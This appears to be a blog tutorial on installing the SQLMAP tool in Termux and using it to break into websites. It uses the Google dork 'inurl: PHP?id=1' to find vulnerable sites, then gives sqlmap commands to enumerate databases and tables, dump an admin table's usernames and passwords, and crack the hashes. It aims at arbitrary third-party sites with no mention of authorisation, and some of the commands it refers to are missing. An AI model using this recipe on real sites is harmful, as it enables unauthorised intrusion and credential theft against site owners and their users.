First We are going to update the package list with the command: apt update Now we have to install Python with the following command: apt install python python2 Wait until python is installed. After installing python we will install git. Git will help you to clone the package. apt install git After installing git we are going to clone the SQLMAP package into our directory with the help of the git command. git clone https://github.com/sqlmapproject/sqlmap Wait for the process to be finished. As the process is finished now we need to enter the tool directory with the following command. cd sqlmap Now we need to give them permission to read-write and execute the SQLMAP python file by using the command: chmod +x sqlmap.py After that, you need to run the following command to run the SQLMAP python2 sqlmap.py Now SQLMAP is successfully installed on your Termux. If you want to run SQLMAP again next time then you need to launch the Termux then you need to enter the directory of SQLMAP by typing the following command cd sqlmap. And then you need to run the SQLMAP by using the following command python2 sqlmap.py.
Now let’s see how to hack the website using SQLMAP
First, let me tell you. You can hack the websites that have SQL injection vulnerability. Now you might be thinking about how to find a website that has SQL injection vulnerability. You can use google dorks to find out SQL injection vulnerability in the website. Most of the website have SQL injection vulnerability start with PHP?id=1 or any kind of value which is present after PHP?id= To find the vulnerable websites you can use this google dork inurl: PHP?id=1 or any value after PHP?id= You can find more information about Google dorks here: Google hacking Type the following command: This command will help you to find out the database of the website python2 sqlmap.py -u <your website> –dbs If the website is vulnerable then you will found the output similar to this: *Information_schema*Database Now our next step is to find tables that are present in the database with the following command python2 sqlmap.py -u <your website> –D Database –tables The above command tells Sqlmap to find out tables that are present under the database. Note: You will see information schema don’t waste your time in finding credentials or any juicy information in that schema because information schema is of no use. After running the above command you will see tables something like this.
*id *users *admin
Now our next step is to find columns under the table admin.
The above command will save the username and password in the text format on your device.
The password may be in an encrypted form such as md5 most of the passwords are in text form. If the password is encrypted then you need to decrypt the password using findmyhash or any other program which is used to decrypt the password.
Hello, Myself Bhabesh, living in Bengaluru, Karnataka, India. I’m a Penetration Tester, Cyber Security Analyst, Threats hunter, Vulnerability founder, Bug Bounty hunter, System Hacker, Exploiting expert, Android hacker, Reverse Engineer, Malware Analyst, SIEM or UTM & SOC Analyst, Security Researcher with great innovation and latest technology gadgets.
View all posts by B4cKD00₹